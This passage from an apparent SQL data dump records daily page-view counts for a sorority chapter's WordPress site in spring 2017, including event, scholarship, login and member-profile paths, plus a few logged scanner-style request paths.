hip/','2017-04-19',1,59),('/scholarship/','2017-04-19',2,797),('/login','2017-04-19',1,549),('/login/','2017-04-19',1,549),('/programs/','2017-04-19',4,247),('/appa','2017-04-19',1,781),('/appa/','2017-04-19',1,781),('/bog','2017-04-19',1,772),('/bog/','2017-04-19',1,772),('/zen','2017-04-19',1,786),('/zen/','2017-04-19',1,786),('/youth/','2017-04-19',1,738),('/','2017-04-20',35,6),('/index.php?phpinfo=1','2017-04-20',2,6),('/?phpinfo=1','2017-04-20',2,6),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','2017-04-20',1,657),('/membership/','2017-04-20',4,576),('/scholarship/','2017-04-20',5,797),('/programs/','2017-04-20',4,247),('/history/','2017-04-20',3,190),('/members/','2017-04-20',4,553),('/cause/marchofdimes-2/','2017-04-20',2,90),('/event/marchofdimes/','2017-04-20',2,1034),('/event/breakfast-on-the-go/','2017-04-20',1,493),('/event/march-dimes-march-babies/','2017-04-20',1,1007),('/event/winetasting/','2017-04-20',1,1038),('/lgz-celebrates-35-years-service-howard-county-md/','2017-04-20',1,956),('/login','2017-04-20',1,549),('/login/','2017-04-20',1,549),('/ts_teams/shanee-satchell/','2017-04-20',1,820),('/','2017-04-21',49,6),('/event/march-dimes-march-babies/','2017-04-21',2,1007),('/login','2017-04-21',2,549),('/login/','2017-04-21',2,549),('/cause/marchofdimes-2/','2017-04-21',3,90),('/membership/','2017-04-21',2,576),('/event/breakfast-on-the-go/','2017-04-21',1,493),('/history/','2017-04-21',1,190),('/members/','2017-04-21',2,553),('/scholarship/','2017-04-21',4,797),('/cause/marchofdimes-2/','2017-04-22',2,90),('/','2017-04-22',40,6),('/user/','2017-04-22',28,547),('/event/marchofdimes/','2017-04-22',1,1034),('/scholarship/','2017-04-22',1,797),('/event/winetasting/','2017-04-22',1,1038),('/youth/','2017-04-22',1,738),('/user/','2017-04-23',53,547),('/','2017-04-23',37,6),('/event/winetasting/','2017-04-23',2,1038),('/login','2017-04-23',2,549),('/login/','2017-04-23',2,549),('/event/breakfast-on-the-go/','2017-04-23',1,493),('/scholarship/','2017-04-23',2,797),('/members/','2017-04-23',3,553),('/ts_teams/ava-lawson/','2017-04-23',1,872),('/','2017-04-24',41,6),('/history/','2017-04-24',1,190),('/members/','2017-04-24',1,553),('/programs/','2017-04-24',1,247),('/scholarship/','2017-04-24',5,797),('/cause/marchofdimes-2/','2017-04-24',1,90),('/event/marchofdimes/','2017-04-24',1,1034),('/event/breakfast-on-the-go/','2017-04-24',1,493),('/event/march-dimes-march-babies/','2017-04-24',1,1007),('/event/winetasting/','2017-04-24',1,1038),('/lgz-celebrates-35-years-service-howard-county-md/','2017-04-24',1,956),('/login','2017-04-24',1,549),('/ts_teams/cherice-daniel-2/','2017-04-24',1,825),('/ts_teams/lillet-williams-2/','2017-04-24',1,824),('/ts_teams/lillet-williams/','2017-04-24',1,823),('/ts_teams/constance-kinder/','2017-04-24',1,822),('/ts_teams/tamara-curtis/','2017-04-24',1,821),('/ts_teams/shanee-satchell/','2017-04-24',1,820),('/ts_teams/kathy-j-barrett/','2017-04-24',1,819),('/ts_teams/christy-lewis/','2017-04-24',1,818),('/ts_teams/dawn-j-kemp/','2017-04-24',1,817),('/ts_teams/crystal-whitaker/','2017-04-24',1,816),('/ts_teams/tracy-irvin/','2017-04-24',1,815),('/ts_teams/tamika-r-daniels/','2017-04-24',1,814),('/ts_teams/kalima-alawode/','2017-04-24',1,888),('/ts_teams/kathy-ball/','2017-04-24',1,887),('/ts_teams/linda-brigmon/','2017-04-24',1,886),('/ts_teams/patreece-carter/','2017-04-24',1,885),('/ts_teams/kristin-clark/','2017-04-24',1,883),('/ts_teams/ebony-cogdell/','2017-04-24',1,882),('/ts_teams/w-ruth-conway/','2017-04-24',1,881),('/ts_teams/cassandra-dorsey/','2017-04-24',1,880),('/ts_teams/maya-franklin/','2017-04-24',1,878),('/ts_teams/michele-franklin/','2017-04-24',1,877),('/ts_teams/quiyatta-gardner/','2017-04-24',1,876),('/ts_teams/sandra-hudson/','2017-04-24',1,875),('/ts_teams/angela-jefferson/','2017-04-24',1,874),('/ts_teams/ava-lawson/','2017-04-24',1,872),('/ts_teams/rose-matthews/','2017-04-24',1,870),('/ts_teams/helen-newman/','2017-04-24',1,868),('/ts_teams/linda-price/','2017-04-24',1,867),('/ts_teams/rosee-ragin/','2017-04-24',1,866),('/ts_teams/gloria-sanders/','2017-04-24',1,865),('/ts_teams/jontue-sumler/','2017-04-24',1,862),('/ts_teams/celia-worrell/','2017-04-24',1,860),('/ts_teams/jeaneathia-yerby-crowder/','2017-04-24',1,828),('/cause/march-of-dimes/','2017-04-24',1,1023),('/cause/scholarship/','2017-04-24',1,59),('/login/','2017-04-24',1,549),('/download/aarc/','2017-04-24',1,991),('/download/constitution-by-laws/','2017-04-24',1,989),('/user/','2017-04-24',33,547),('/scholarship','2017-04-24',1,797),('/','2017-04-25',20,6),('/cause/marchofdimes-2/','2017-04-25',6,90),('/members/','2017-04-25',4,553),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','2017-04-25',1,657),('/event/march-dimes-march-babies/','2017-04-25',1,1007),('/login','2017-04-25',2,549),('/programs','2017-04-25',1,247),('/login/','2017-04-25',3,549),('/programs/','2017-04-25',1,247),('/members','2017-04-25',1,553),('/event/breakfast-on-the-go','2017-04-25',1,493),('/cause/marchofdimes-2','2017-04-25',1,90),('/scholarship','2017-04-25',1,797),('/scholarship/','2017-04-25',1,797),('/event/breakfast-on-the-go/','2017-04-25',1,493),('/','2017-04-26',45,6),('/cause/marchofdimes-2/','2017-04-26',2,90),('/scholarship/','2017-04-26',9,797),('/scholarship','2017-04-26',6,797),('/ts_teams/gloria-sanders/','2017-04-26',1,865),('/lgz-celebrates-35-years-service-howard-county-md/','2017-04-26',17,956),('/event/marchofdimes/','2017-04-26',1,1034),('/cause/scholarship/','2017-04-26',1,59),('/members/','2017-04-26',2,553),('/history/','2017-04-26',3,190),('/','2017-04-27',29,6),('/cause/marchofdimes-2/','2017-04-27',1,90),('/members/','2017-04-27',2,553),('/programs/','2017-04-27',1,247),('/scholarship/','2017-04-27',3,797),('/scholarship','2017-04-27',2,797),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','2017-04-27',1,657),('/','2017-04-28',31,6),('/membership/','2017-04-28',2,576),('/event/winetasting/','2017-04-28',1,1038),('/','2017-04-29',28,6),('/members/','2017-04-29',1,553),('/scholarship/','2017-04-29',2,797),('/scholarship','2017-04-29',1,797),('/event/marchofdimes/','2017-04-29',1,1034),('/ts_teams/rose-matthews/','2017-04-29',1,870),('/ts_teams/jeaneathia-yerby-crowder/','2017-04-29',1,828),('/ts_teams/quiyatta-gardner/','2017-04-29',1,876),('/ts_teams/tamara-curtis/','2017-04-29',1,821),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','2017-04-30',1,657),('/','2017-04-30',51,6),('/index.php?option=com_user&task=register','2017-04-30',1,6),('/?option=com_user&task=register','2017-04-30',1,6),('/event/marchofdimes/','2017-04-30',1,1034),('/event/breakfast-on-the-go/','2017-04-30',1,493),('/event/march-dimes-march-babies/','2017-04-30',1,1007),('/members/','2017-04-30',1,553),('/programs/','2017-04-30',1,247),('/scholarship/','2017-04-30',1,797),('/','2017-05-01',88,6),('/scholarship/','2017-05-01',3,797),('/event/marchofdimes/','2017-05-01',2,1034),('/members/','2017-05-01',1,553),('/event/breakfast-on-the-go/','2017-05-01',2,493),('/login','2017-05-01',1,549),('/login/','2017-05-01',2,549),('/history/','2017-05-01',1,190),('/programs/','2017-05-01',1,247),('/cause/marchofdimes-2/','2017-05-01',1,90),('/event/march-dimes-march-babies/','2017-05-01',1,1007),('/','2017-05-02',71,6),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','2017-05-02',1,657),('/scholarship/','2017-05-02',2,797),('/cause/march-of-dimes/','2017-05-02',1,1023),('/event/marchofdimes/','2017-05-02',1,1034),('/login','2017-05-02',1,549),('/login/','2017-05-02',1,549),('/event/winetasting/','2017-05-02',5,1038),('/event/march-dimes-march-babies/','2017-05-02',1,1007),('/event/breakfast-on-the-go/','2017-05-02',1,493),('/programs/','2017-05-02',1,247),('/members/','2017-05-02',1,553),('/history/','2017-05-02',1,190),('/','2017-05-03',69,6),('/history/','2017-05-03',3,190),('/members/','2017-05-03',3,553),('/programs/','2017-05-03',3,247),('/scholarship/','2017-05-03',5,797),('/cause/marchofdimes-2/','2017-05-03',3,90),('/event/marchofdimes/','2017-05-03',3,1034),('/event/breakfast-on-the-go/','2017-05-03',3,493),('/event/march-dimes-march-babies/','2017-05-03',3,1007),('/event/winetasting/','2017-05-03',5,1038),('/lgz-celebrates-35-years-service-howard-county-md/','2017-05-03',3,956),('/login','2017-05-03',1,549),('/ts_teams/cherice-daniel-2/','2017-05-03',2,825),('/login/','2017-05-03',2,549),('/ts_teams/lillet-williams-2/','2017-05-03',2,824),('/ts_teams/lillet-williams/','2017-05-03',2,823),('/ts_teams/constance-kinder/','2017-05-03',2,822),('/ts_teams/tamara-curtis/','2017-05-03',2,821),('/ts_teams/shanee-satchell/','2017-05-03',2,820),('/ts_teams/kathy-j-barrett/','2017-05-03',2,819),('/ts_teams/christy-lewis/','2017-05-03',2,818),('/ts_teams/dawn-j-kemp/','2017-05-03',2,817),('/ts_teams/crystal-whitaker/','2017-05-03',2,816),('/ts_teams/tracy-irvin/','2017-05-03',2,815),('/','2017-05-04',35,6),('/cause/marchofdimes-2/','2017-05-04',3,90),('/scholarship/','2017-05-04',1,797),('/event/winetasting/','2017-05-04',5,1038),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','2017-05-04',1,657),('/','2017-05-05',55,6),('/event/winetasting/','2017-05-05',5,1038),('/history/','2017-05-05',2,190),('/scholarship/','2017-05-05',3,797),('/event/winetasting/','2017-05-06',6,1038),('/','2017-05-06',59,6),('/members/','2017-05-06',1,553),('/login','2017-05-06',1,549),('/login/','2017-05-06',2,549),('/ts_teams/helen-newman/','2017-05-06',1,868),('/cause/marchofdimes-2/','2017-05-06',1,90),('/cause/march-of-dimes/','2017-05-06',1,1023),('/event/march-dimes-march-babies/','2017-05-06',2,1007),('/','2017-05-07',34,6),('/event/march-dimes-march-babies/','2017-05-07',5,1007),('/cause/marchofdimes-2/','2017-05-07',4,90),('/','2017-05-08',36,6),('/event/winetasting/','2017-05-08',3,1038),('/programs/','2017-05-08',1,247),('/scholarship/','2017-05-08',5,797),('/members/','2017-05-08',11,553),('/history/','2017-05-08',2,190),('/scholarship','2017-05-08',1,797),('/event/marchofdimes/','2017-05-08',1,1034),('/event/march-dimes-march-babies/','2017-05-08',1,1007),('/','2017-05-09',35,6),('/members/','2017-05-09',6,553),('/programs/','2017-05-09',2,247),('/history','2017-05-09',1,190),('/history/','2017-05-09',1,190),('/scholarship/','2017-05-09',2,797),('/lgz-celebrates-35-years-service-howard-county-md/','2017-05-09',1,956),('/event/march-dimes-march-babies/','2017-05-09',1,1007),('/?=Send&contact-form-email=1&contact-form-name=1&contact-form-text=1','2017-05-09',1,6),('/?contact-form-email=1&contact-form-name=1&contact-form-text=1','2017-05-09',1,6),('/','2017-05-10',56,6),('/login','2017-05-10',1,549),('/login/','2017-05-10',2,549),('/login/?action=register','2017-05-10',1,549),('/login-2/?registration=disabled','2017-05-10',1,657),('/cause/marchofdimes-2/','2017-05-10',6,90),('/programs/','2017-05-10',5,247),('/members','2017-05-10',12,553),('/members/','2017-05-10',14,553),('/scholarship','2017-05-10',1,797),('/scholarship/','2017-05-10',3,797),('/zen/','2017-05-10',2,786),('/?contact-form-email=1&contact-form-name=1&contact-form-text=1','2017-05-10',2,6),('/event/marchofdimes/','2017-05-10',3,1034),('/event/march-dimes-march-babies/','2017-05-10',2,1007),('/event/breakfast-on-the-go/','2017-05-10',2,493),('/history/','2017-05-10',2,190),('/download/aarc/','2017-05-10',1,991),('/download/constitution-by-laws/','2017-05-10',1,989),('/cause/scholarship/','2017-05-10',1,59),('/cause/march-of-dimes/','2017-05-10',1,1023),('/ts_teams/patreece-carter/','2017-05-10',1,885),('/ts_teams/constance-kinder/','2017-05-10',1,822),('/ts_teams/rosee-ragin/','2017-05-10',1,866),('/ts_teams/crystal-whitaker/','2017-05-10',1,816),('/ts_teams/kathy-ball/','2017-05-10',1,887),('/ts_teams/ava-lawson/','2017-05-10',1,872),('/ts_teams/tamika-r-daniels/','2017-05-10',1,814),('/ts_teams/quiyatta-gardner/','2017-05-10',1,876),('/event/winetasting/','2017-05-10',1,1038),('/ts_teams/michele-franklin/','2017-05-10',1,877),('/ts_teams/cherice-daniel-2/','2017-05-10',1,825),('/ts_teams/rose-matthews/','2017-05-10',1,870),('/lgz-celebrates-35-years-service-howard-county-md/','2017-05-10',1,956),('/','2017-05-11',35,6),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','2017-05-11',1,657),('/members/','2017-05-11',6,553),('/download/constitution-by-laws/','2017-05-11',1,989),('/event/march-dimes-march-babies/','2017-05-11',1,1007),('/scholarship/','2017-05-11',2,797),('/programs/','2017-05-11',3,247),('/history/','2017-05-11',1,190),('/','2017-05-12',18,6),('/history/','2017-05-12',2,190),('/cause/marchofdimes-2/','2017-05-12',2,90),('/scholarship/','2017-05-13',4,797),('/scholarship','2017-05-13',1,797),('/','2017-05-13',19,6),('/cause/marchofdimes-2/','2017-05-13',1,90),('/event/marchofdimes/','2017-05-13',1,1034),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','2017-05-13',1,657),('/members/','2017-05-13',2,553),('/event/march-dimes-march-babies/','2017-05-13',1,1007),('/membership/','2017-05-13',3,576),('/user/','2017-05-13',1,547),('/','2017-05-14',20,6),('/members/','2017-05-14',3,553),('/membership/','2017-05-14',3,576),('/history/','2017-05-14',1,190),('/scholarship/','2017-05-14',6,797),('/programs/','2017-05-14',1,247),('/cause/marchofdimes-2/','2017-05-14',1,90),('/event/marchofdimes/','2017-05-14',1,1034),('/event/breakfast-on-the-go/','2017-05-14',2,493),('/event/march-dimes-march-babies/','2017-05-14',1,1007),('/event/winetasting/','2017-05-14',1,1038),('/login','2017-05-14',1,549),('/lgz-celebrates-35-years-service-howard-county-md/','2017-05-14',1,956),('/login/','2017-05-14',2,549),('/ts_teams/cherice-daniel-2/','2017-05-14',1,825),('/ts_teams/lillet-williams-2/','2017-05-14',1,824),('/ts_teams/lillet-williams/','2017-05-14',1,823),('/ts_teams/constance-kinder/','2017-05-14',1,822),('/ts_teams/tamara-curtis/','2017-05-14',1,821),('/ts_teams/shanee-satchell/','2017-05-14',1,820),('/ts_teams/kathy-j-barrett/','2017-05-14',1,819),('/ts_teams/dawn-j-kemp/','2017-05-14',1,817),('/ts_teams/christy-lewis/','2017-05-14',1,818),('/ts_teams/crystal-whitaker/','2017-05-14',1,816),('/ts_teams/tracy-irvin/','2017-05-14',1,815),('/ts_teams/tamika-r-daniels/','2017-05-14',1,814),('/ts_teams/kalima-alawode/','2017-05-14',1,888),('/ts_teams/kathy-ball/','2017-05-14',1,887),('/ts_teams/linda-brigmon/','2017-05-14',1,886),('/ts_teams/patreece-carter/','2017-05-14',1,885),('/ts_teams/kristin-clark/','2017-05-14',1,883),('/ts_teams/ebony-cogdell/','2017-05-14',1,882),('/ts_teams/w-ruth-conway/','2017-05-14',1,881),('/ts_teams/maya-franklin/','2017-05-14',1,878),('/ts_teams/cassandra-dorsey/','2017-05-14',1,880),('/ts_teams/michele-franklin/','2017-05-14',1,877),('/ts_teams/quiyatta-gardner/','2017-05-14',1,876),('/ts_teams/sandra-hudson/','2017-05-14',1,875),('/ts_teams/angela-jefferson/','2017-05-14',1,874),('/ts_teams/ava-lawson/','2017-05-14',1,872),('/ts_teams/rose-matthews/','2017-05-14',1,870),('/ts_teams/helen-newman/','2017-05-14',1,868),('/ts_teams/linda-price/','2017-05-14',1,867),('/ts_teams/rosee-ragin/','2017-05-14',1,866),('/ts_teams/gloria-sanders/','2017-05-14',1,865),('/ts_teams/jontue-sumler/','2017-05-14',1,862),('/ts_teams/celia-worrell/','2017-05-14',1,860),('/ts_teams/jeaneathia-yerby-crowder/','2017-05-14',1,828),('/scholarship','2017-05-14',3,797),('/appa','2017-05-14',1,781),('/bog','2017-05-14',1,772),('/youth','2017-05-14',1,738),('/appa/','2017-05-14',1,781),('/bog/','2017-05-14',1,772),('/youth/','2017-05-14',1,738),('/zen','2017-05-14',1,786),('/zen/','2017-05-14',1,786),('/cause/scholarship/','2017-05-14',1,59),('/cause/march-of-dimes/','2017-05-14',1,1023),('/download/aarc/','2017-05-14',1,991),('/download/constitution-by-laws/','2017-05-14',1,989),('/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years/','2017-05-14',1,689),('/','2017-05-15',19,6),('/history/','2017-05-15',1,190),('/scholarship/','2017-05-15',1,797),('/cause/marchofdimes-2/','2017-05-15',3,90),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','2017-05-16',1,657),('/members/','2017-05-16',3,553),('/','2017-05-16',28,6),('/cause/marchofdimes-2/','2017-05-16',2,90),('/scholarship/','2017-05-16',2,797),('/','2017-05-17',32,6),('/cause/marchofdimes-2/','2017-05-17',3,90),('/event/winetasting/','2017-05-17',13,1038),('/index.php','2017-05-17',1,6),('/scholarship/','2017-05-17',5,797),('/programs/','2017-05-17',3,247),('/history/','2017-05-17',3,190),('/members/','2017-05-17',3,553),('/event/marchofdimes/','2017-05-17',2,1034),('/event/breakfast-on-the-go/','2017-05-17',2,493),('/event/march-dimes-march-babies/','2017-05-17',2,1007),('/lgz-celebrates-35-years-service-howard-county-md/','2017-05-17',1,956),('/','2017-05-18',25,6),('/programs/','2017-05-18',2,247),('/event/winetasting/','2017-05-18',5,1038),('/membership/','2017-05-18',3,576),('/event/marchofdimes/','2017-05-18',2,1034),('/history/','2017-05-18',1,190),('/members/','2017-05-18',2,553),('/scholarship/','2017-05-18',1,797),('/cause/marchofdimes-2/','2017-05-18',1,90),('/event/breakfast-on-the-go/','2017-05-18',1,493),('/event/march-dimes-march-babies/','2017-05-18',1,1007),('/lgz-celebrates-35-years-service-howard-county-md/','2017-05-18',1,956),('/cause/march-of-dimes/','2017-05-18',3,1023),('/ts_teams/rosee-ragin/','2017-05-18',1,866),('/cause/march-of-dimes/','2017-05-19',5,1023),('/','2017-05-19',31,6),('/event/winetasting/','2017-05-19',1,1038),('/history/','2017-05-19',1,190),('/scholarship/','2017-05-19',4,797),('/scholarship','2017-05-19',2,797),('/members/','2017-05-19',1,553),('/cause/march-of-dimes/','2017-05-20',2,1023),('/','2017-05-20',40,6),('/history/','2017-05-20',10,190),('/members/','2017-05-20',13,553),('/programs/','2017-05-20',8,247),('/bog','2017-05-20',1,772),('/bog/','2017-05-20',1,772),('/appa','2017-05-20',4,781),('/appa/','2017-05-20',3,781),('/login','2017-05-20',1,549),('/login/','2017-05-20',1,549),('/event/winetasting/','2017-05-20',4,1038),('/history','2017-05-20',2,190),('/ts_teams/tamara-curtis/','2017-05-20',1,821),('/ts_teams/shanee-satchell/','2017-05-20',1,820),('/lgz-celebrates-35-years-service-howard-county-md/','2017-05-20',6,956),('/ts_teams/kathy-j-barrett/','2017-05-20',1,819),('/scholarship/','2017-05-20',10,797),('/ts_teams/christy-lewis/','2017-05-20',1,818),('/event/march-dimes-march-babies/','2017-05-20',5,1007),('/cause/marchofdimes-2/','2017-05-20',4,90),('/ts_teams/dawn-j-kemp/','2017-05-20',1,817),('/event/marchofdimes/','2017-05-20',4,1034),('/ts_teams/crystal-whitaker/','2017-05-20',1,816),('/ts_teams/tracy-irvin/','2017-05-20',1,815),('/event/breakfast-on-the-go/','2017-05-20',3,493),('/ts_teams/tamika-r-daniels/','2017-05-20',2,814),('/ts_teams/kalima-alawode/','2017-05-20',1,888),('/ts_teams/kathy-ball/','2017-05-20',1,887),('/ts_teams/linda-brigmon/','2017-05-20',1,886),('/ts_teams/patreece-carter/','2017-05-20',1,885),('/scholarship','2017-05-20',1,797),('/ts_teams/kristin-clark/','2017-05-20',1,883),('/ts_teams/ebony-cogdell/','2017-05-20',1,882),('/ts_teams/w-ruth-conway/','2017-05-20',1,881),('/ts_teams/cassandra-dorsey/','2017-05-20',1,880),('/ts_teams/maya-franklin/','2017-05-20',1,878),('/ts_teams/michele-franklin/','2017-05-20',1,877),('/ts_teams/quiyatta-gardner/','2017-05-20',1,876),('/wp-register.php','2017-05-20',1,6),('/register/','2017-05-20',1,1006),('/login-2/?registration=disabled','2017-05-20',1,657),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','2017-05-20',1,657),('/lgz-celebrates-35-years-service-howard-county-md/','2017-05-21',3,956),('/','2017-05-21',53,6),('/event/winetasting/','2017-05-21',2,1038),('/history','2017-05-21',1,190),('/history/','2017-05-21',2,190),('/members','2017-05-21',1,553),('/members/','2017-05-21',1,553),('/event/marchofdimes/','2017-05-21',1,1034),('/event/march-dimes-march-babies/','2017-05-21',1,1007),('/programs/','2017-05-21',2,247),('/appa','2017-05-21',1,781),('/appa/','2017-05-21',2,781),('/scholarship/','2017-05-21',1,797),('/','2017-05-22',28,6),('/scholarship/','2017-05-22',3,797),('/history/','2017-05-22',2,190),('/members/','2017-05-22',4,553),('/programs/','2017-05-22',1,247),('/cause/marchofdimes-2/','2017-05-22',1,90),('/event/marchofdimes/','2017-05-22',1,1034),('/event/breakfast-on-the-go/','2017-05-22',1,493),('/event/march-dimes-march-babies/','2017-05-22',1,1007),('/event/winetasting/','2017-05-22',1,1038),('/lgz-celebrates-35-years-service-howard-county-md/','2017-05-22',1,956),('/login','2017-05-22',1,549),('/ts_teams/cherice-daniel-2/','2017-05-22',1,825),('/ts_teams/lillet-williams-2/','2017-05-22',1,824),('/ts_teams/lillet-williams/','2017-05-22',1,823),('/ts_teams/constance-kinder/','2017-05-22',1,822),('/ts_teams/tamara-curtis/','2017-05-22',1,821),('/ts_teams/shanee-satchell/','2017-05-22',1,820),('/ts_teams/kathy-j-barrett/','2017-05-22',1,819),('/ts_teams/christy-lewis/','2017-05-22',1,818),('/ts_teams/dawn-j-kemp/','2017-05-22',1,817),('/ts_teams/crystal-whitaker/','2017-05-22',1,816),('/ts_teams/tracy-irvin/','2017-05-22',1,815),('/ts_teams/tamika-r-daniels/','2017-05-22',2,814),('/ts_teams/kalima-alawode/','2017-05-22',1,888),('/ts_teams/kathy-ball/','2017-05-22',1,887),('/ts_teams/linda-brigmon/','2017-05-22',1,886),('/ts_teams/patreece-carter/','2017-05-22',1,885),('/ts_teams/kristin-clark/','2017-05-22',1,883),('/ts_teams/ebony-cogdell/','2017-05-22',1,882),('/ts_teams/w-ruth-conway/','2017-05-22',1,881),('/ts_teams/cassandra-dorsey/','2017-05-22',1,880),('/ts_teams/maya-franklin/','2017-05-22',1,878),('/ts_teams/michele-franklin/','2017-05-22',1,877),('/ts_teams/quiyatta-gardner/','2017-05-22',1,876),('/ts_teams/sandra-hudson/','2017-05-22',1,875),('/ts_teams/angela-jefferson/','2017-05-22',1,874),('/ts_teams/ava-lawson/','2017-05-22',1,872),('/ts_teams/rose-matthews/','2017-05-22',1,870),('/ts_teams/helen-newman/','2017-05-22',1,868),('/ts_teams/linda-price/','2017-05-22',1,867),('/ts_teams/rosee-ragin/','2017-05-22',1,866),('/ts_teams/gloria-sanders/','2017-05-22',1,865),('/ts_teams/jontue-sumler/','2017-05-22',1,862),('/ts_teams/celia-worrell/','2017-05-22',1,860),('/ts_teams/jeaneathia-yerby-crowder/','2017-05-22',1,828),('/cause/march-of-dimes/','2017-05-22',1,1023),('/cause/scholarship/','2017-05-22',1,59),('/login/','2017-05-22',1,549),('/download/aarc/','2017-05-22',1,991),('/download/constitution-by-laws/','2017-05-22',1,989),('/appa/','2017-05-22',1,781),('/','2017-05-23',32,6),('/event/winetasting/','2017-05-23',2,1038),('/history/','2017-05-23',3,190),('/cause/marchofdimes-2/','2017-05-23',1,90),('/login','2017-05-23',3,549),('/login/','2017-05-23',3,549),('/members/','2017-05-23',8,553),('/login-2/?loggedout=true','2017-05-23',1,657),('/programs/','2017-05-23',5,247),('/lgz-celebrates-35-years-service-howard-county-md/','2017-05-23',3,956),('/appa/','2017-05-23',2,781),('/','2017-05-24',782,6),('/lgz-celebrates-35-years-service-howard-county-md/','2017-05-24',4,956),('/event/winetasting/','2017-05-24',3,1038),('/ts_teams/helen-newman/','2017-05-24',1,868),('/members/','2017-05-24',9,553),('/scholarship/','2017-05-24',1,797),('/history/','2017-05-24',1,190),('/event/march-dimes-march-babies/','2017-05-24',1,1007),('/cause/marchofdimes-2/','2017-05-24',1,90),('/programs/','2017-05-24',1,247),('/event/breakfast-on-the-go/','2017-05-24',1,493),('/event/marchofdimes/','2017-05-24',1,1034),('/','2017-05-25',98,6),('/members/','2017-05-25',5,553),('/ts_teams/cherice-daniel-2/','2017-05-25',1,825),('/ts_teams/lillet-williams-2/','2017-05-25',1,824),('/scholarship/','2017-05-25',3,797),('/history/','2017-05-25',4,190),('/programs/','2017-05-25',1,247),('/download/constitution-by-laws/','2017-05-25',3,989),('/members/','2017-05-26',2,553),('/','2017-05-26',20,6),('/membership/trackback/','2017-05-26',1,576),('/','2017-05-27',16,6),('/scholarship/','2017-05-27',1,797),('/history/','2017-05-27',1,190),('/programs/','2017-05-27',1,247),('/members/','2017-05-27',1,553),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2Ftheme-editor.php%3Ffile%3Dheader.php&reauth=1','2017-05-27',1,657),('/','2017-05-28',17,6),('/members/','2017-05-28',1,553),('/appa/','2017-05-28',1,781),('/history/','2017-05-28',1,190),('/programs/','2017-05-29',1,247),('/','2017-05-29',21,6),('/login','2017-05-29',1,549),('/login/','2017-05-29',1,549),('/','2017-05-30',21,6),('/?gf_page=upload','2017-05-30',1,6),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2F%3Fgf_page%3Dupload&reauth=1','2017-05-30',1,657),('/scholarship/','2017-05-30',2,797),('/cause/marchofdimes-2/','2017-05-30',1,90),('/scholarship','2017-05-30',1,797),('/event/winetasting/','2017-05-30',1,1038),('/','2017-05-31',33,6),('/membership/','2017-05-31',2,576),('/','2017-06-01',15,6),('/programs/','2017-06-01',1,247),('/','2017-06-02',41,6),('/history/','2017-06-02',5,190),('/members/','2017-06-02',8,553),('/programs/','2017-06-02',5,247),('/scholarship/','2017-06-02',6,797),('/login','2017-06-02',1,549),('/event/marchofdimes/','2017-06-02',2,1034),('/lgz-celebrates-35-years-service-howard-county-md/','2017-06-02',1,956),('/event/breakfast-on-the-go/','2017-06-02',2,493),('/event/march-dimes-march-babies/','2017-06-02',1,1007),('/cause/marchofdimes-2/','2017-06-02',5,90),('/event/winetasting/','2017-06-02',1,1038),('/login/','2017-06-02',1,549),('/scholarship','2017-06-02',1,797),('/zen/','2017-06-02',1,786),('/history','2017-06-02',1,190),('/members','2017-06-02',1,553),('/','2017-06-03',25,6),('/programs/','2017-06-03',1,247),('/scholarship/','2017-06-03',2,797),('/ts_teams/ava-lawson/','2017-06-03',1,872),('/','2017-06-04',24,6),('/login','2017-06-04',2,549),('/history/','2017-06-04',2,190),('/programs/','2017-06-04',3,247),('/event/marchofdimes/','2017-06-04',2,1034),('/event/march-dimes-march-babies/','2017-06-04',2,1007),('/event/winetasting/','2017-06-04',2,1038),('/lgz-celebrates-35-years-service-howard-county-md/','2017-06-04',2,956),('/cause/marchofdimes-2/','2017-06-04',2,90),('/scholarship/','2017-06-04',2,797),('/event/breakfast-on-the-go/','2017-06-04',2,493),('/members/','2017-06-04',2,553),('/ts_teams/cherice-daniel-2/','2017-06-04',1,825),('/ts_teams/lillet-williams-2/','2017-06-04',1,824),('/ts_teams/lillet-williams/','2017-06-04',1,823),('/ts_teams/constance-kinder/','2017-06-04',1,822),('/ts_teams/tamara-curtis/','2017-06-04',1,821),('/ts_teams/shanee-satchell/','2017-06-04',1,820),('/ts_teams/kathy-j-barrett/','2017-06-04',1,819),('/ts_teams/christy-lewis/','2017-06-04',1,818),('/ts_teams/dawn-j-kemp/','2017-06-04',1,817),('/ts_teams/crystal-whitaker/','2017-06-04',1,816),('/ts_teams/tracy-irvin/','2017-06-04',1,815),('/ts_teams/tamika-r-daniels/','2017-06-04',1,814),('/ts_teams/nathalia-drew/','2017-06-04',1,1084),('/ts_teams/kalima-alawode/','2017-06-04',1,888),('/ts_teams/kathy-ball/','2017-06-04',1,887),('/ts_teams/linda-brigmon/','2017-06-04',1,886),('/ts_teams/patreece-carter/','2017-06-04',1,885),('/ts_teams/kristin-clark/','2017-06-04',1,883),('/ts_teams/ebony-cogdell/','2017-06-04',1,882),('/ts_teams/w-ruth-conway/','2017-06-04',1,881),('/ts_teams/cassandra-dorsey/','2017-06-04',1,880),('/ts_teams/maya-franklin/','2017-06-04',1,878),('/ts_teams/michele-franklin/','2017-06-04',1,877),('/ts_teams/quiyatta-gardner/','2017-06-04',1,876),('/ts_teams/sandra-hudson/','2017-06-04',1,875),('/ts_teams/angela-jefferson/','2017-06-04',1,874),('/ts_teams/ava-lawson/','2017-06-04',1,872),('/ts_teams/rose-matthews/','2017-06-04',1,870),('/ts_teams/helen-newman/','2017-06-04',1,868),('/ts_teams/linda-price/','2017-06-04',1,867),('/ts_teams/rosee-ragin/','2017-06-04',1,866),('/ts_teams/gloria-sanders/','2